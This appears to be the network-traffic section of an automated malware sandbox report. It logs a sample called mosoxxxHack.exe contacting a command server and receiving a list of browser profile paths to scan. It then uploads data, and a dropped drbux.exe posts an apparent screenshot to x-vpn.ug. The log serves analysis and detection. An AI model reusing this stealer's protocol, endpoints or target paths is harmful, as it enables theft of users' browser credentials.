Aug 20, 2021 17:11:00.856621027 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:00.856785059 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:05.856039047 CEST	80	49737	109.234.32.63	192.168.2.3
Aug 20, 2021 17:11:05.856175900 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:06.127975941 CEST	49737	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:11:06.155411005 CEST	80	49737	109.234.32.63	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 20, 2021 17:08:48.889378071 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:08:48.917253017 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 20, 2021 17:08:50.737313032 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:08:50.773298979 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:13.155445099 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:13.192435980 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:23.548341036 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:23.591516972 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:27.835275888 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:27.875901937 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:27.892833948 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:27.934367895 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:45.155138016 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:45.219013929 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:47.499102116 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:47.534676075 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 20, 2021 17:09:59.887895107 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:09:59.937494040 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 20, 2021 17:10:04.184345961 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:10:04.219319105 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 20, 2021 17:10:42.730665922 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:10:42.764468908 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 20, 2021 17:10:45.882504940 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:10:45.931998968 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 20, 2021 17:10:46.532958031 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:10:46.574296951 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 20, 2021 17:10:46.921087027 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:10:46.955327034 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:05.833997011 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:05.877846003 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:36.779675007 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:36.830434084 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:38.786418915 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:38.822658062 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:41.010772943 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:41.152853012 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:42.611186028 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:42.639019966 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:46.218193054 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:46.253983974 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:48.716437101 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:48.749353886 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:50.668793917 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:50.701628923 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 20, 2021 17:11:53.864718914 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 20, 2021 17:11:53.915083885 CEST	53	54366	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 20, 2021 17:09:27.835275888 CEST	192.168.2.3	8.8.8.8	0x1052	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 20, 2021 17:09:27.892833948 CEST	192.168.2.3	8.8.8.8	0x9688	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 20, 2021 17:09:47.499102116 CEST	192.168.2.3	8.8.8.8	0xae9e	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.532958031 CEST	192.168.2.3	8.8.8.8	0xb706	Standard query (0)	x-vpn.ug	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.921087027 CEST	192.168.2.3	8.8.8.8	0xe889	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 20, 2021 17:11:05.833997011 CEST	192.168.2.3	8.8.8.8	0xa9d2	Standard query (0)	redteamminepool.ug	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 20, 2021 17:09:27.875901937 CEST	8.8.8.8	192.168.2.3	0x1052	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 20, 2021 17:09:27.934367895 CEST	8.8.8.8	192.168.2.3	0x9688	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 20, 2021 17:09:47.534676075 CEST	8.8.8.8	192.168.2.3	0xae9e	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:09:47.534676075 CEST	8.8.8.8	192.168.2.3	0xae9e	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:09:47.534676075 CEST	8.8.8.8	192.168.2.3	0xae9e	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:09:47.534676075 CEST	8.8.8.8	192.168.2.3	0xae9e	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:09:47.534676075 CEST	8.8.8.8	192.168.2.3	0xae9e	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.574296951 CEST	8.8.8.8	192.168.2.3	0xb706	No error (0)	x-vpn.ug		109.234.32.63	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.955327034 CEST	8.8.8.8	192.168.2.3	0xe889	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.955327034 CEST	8.8.8.8	192.168.2.3	0xe889	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.955327034 CEST	8.8.8.8	192.168.2.3	0xe889	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.955327034 CEST	8.8.8.8	192.168.2.3	0xe889	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:10:46.955327034 CEST	8.8.8.8	192.168.2.3	0xe889	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 20, 2021 17:11:05.877846003 CEST	8.8.8.8	192.168.2.3	0xa9d2	No error (0)	redteamminepool.ug		193.164.16.126	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.142.79.35:13400

x-vpn.ug

cdn.discordapp.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49706	91.142.79.35	13400	C:\Users\user\Desktop\mosoxxxHack.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:09:19.230205059 CEST	1125	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 91.142.79.35:13400 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Aug 20, 2021 17:09:19.287172079 CEST	1125	IN	HTTP/1.1 100 Continue
Aug 20, 2021 17:09:19.346904993 CEST	1126	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 20 Aug 2021 15:09:19 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Aug 20, 2021 17:09:26.166793108 CEST	1338	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 91.142.79.35:13400 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Aug 20, 2021 17:09:26.223401070 CEST	1338	IN	HTTP/1.1 100 Continue
Aug 20, 2021 17:09:26.322501898 CEST	1339	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 20 Aug 2021 15:09:26 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49711	91.142.79.35	13400	C:\Users\user\Desktop\mosoxxxHack.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:09:46.075707912 CEST	1367	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 91.142.79.35:13400 Content-Length: 1124440 Expect: 100-continue Accept-Encoding: gzip, deflate
Aug 20, 2021 17:09:46.133197069 CEST	1367	IN	HTTP/1.1 100 Continue
Aug 20, 2021 17:09:46.633493900 CEST	2486	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 20 Aug 2021 15:09:46 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49727	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:48.688899994 CEST	9915	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:48.688978910 CEST	9915	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:48.689171076 CEST	9925	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:48.690037966 CEST	9928	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:10:48.716253042 CEST	9930	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:10:48.716284037 CEST	9933	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:10:48.716373920 CEST	9939	OUT	Data Raw: 28 a2 80 12 8a 28 a0 61 45 14 50 02 d1 cd 1c d1 cd 30 0e 68 a3 9a 39 a4 01 45 14 53 10 52 52 d2 52 18 52 f7 a4 a2 80 16 81 45 2d 34 21 0d 14 b4 50 02 50 69 68 a0 02 96 8a 28 00 34 94 b4 1a 60 25 21 a5 a2 90 08 28 34 ec 53 4d 00 14 52 d2 50 01 45 Data Ascii: ((aEP0h9ESRRRRE-4!PPih(4`%!(4SMRPEPEP0-RwEPJZ;RPE`QE1(RQEL@(QGA)i)iM&8p4Zb@EA)At+c,SQBb4Yg 9sF0iT_T
Aug 20, 2021 17:10:48.716392040 CEST	9941	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:10:48.716419935 CEST	9944	OUT	Data Raw: 88 29 45 1f 5a 29 80 b4 b4 82 9d 41 20 28 22 96 8a a1 5c 41 4a 46 69 69 71 45 82 e4 7e 5a fa 52 79 0a 6a 5c 53 b1 47 2a 0e 76 57 fb 3f bd 27 90 c3 a7 35 67 6d 28 14 7b 34 1e d1 94 8c 4e 3b 1a 36 91 da af 62 82 28 f6 61 ed 0a 38 34 a3 ad 5c f2 d4 Data Ascii: )EZ)A ("\AJFiiqE~ZRyj\SG*vW?'5gm({4N;6b(a84\6}E/fV7vr0i60E+0QNQERNSEQKF3LAKF)j(ZbZ(!h@AEQKLZdE-DQKH)iQKH)j"pLZu KZ(Rd($p
Aug 20, 2021 17:10:48.716445923 CEST	9947	OUT	Data Raw: 48 e1 4b 49 45 32 47 53 87 4a 68 a0 50 21 e0 d2 d3 69 41 a0 43 85 3a 99 9a 50 69 92 3e 9c 0d 47 9a 70 34 08 90 1a 70 35 18 34 ec fa 53 21 a2 50 69 e1 aa 10 69 e0 d3 21 a2 70 d4 e0 41 ea 33 50 83 4e 06 95 88 68 79 85 1b b6 29 bf 65 cf 43 4a 0d 48 Data Ascii: HKIE2GSJhP!iAC:Pi>Gp4p54S!Pii!pA3PNhy)eCJH.;Sv`z4m6O]LljKy~z+Th4Q&EBsGjU"(aKgY{WXm9t\|7hg*NERhzWgsd+O(IsT\eR+Zb%Ntj&`w6
Aug 20, 2021 17:10:48.716464043 CEST	9948	OUT	Data Raw: df d4 a3 45 14 77 af 59 1e 08 b4 94 b4 94 31 09 48 69 68 a0 61 4b 48 29 68 40 14 b4 94 b4 08 50 69 69 29 69 89 85 2d 25 2d 50 85 14 ea 68 a5 a0 4c 5a 5a 4a 51 4c 41 4b 49 45 30 1d 45 25 14 c4 2d 14 51 40 85 a2 8a 29 80 b4 e1 4d 14 a0 d3 42 1f 4b Data Ascii: EwY1HihaKH)h@Pii)i-%-PhLZZJQLAKIE0E%-Q@)MBKMW$p4`U\E-1<1@4hIx`iRd8pLPkE6C4znfFp&+892j)ajX=89kfHtOzdOH&nH>Qu*60
Aug 20, 2021 17:10:48.798150063 CEST	10013	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:48 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49728	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:49.189637899 CEST	10013	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:10:49.189806938 CEST	10014	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:10:49.190032005 CEST	10024	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:10:49.190135956 CEST	10026	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
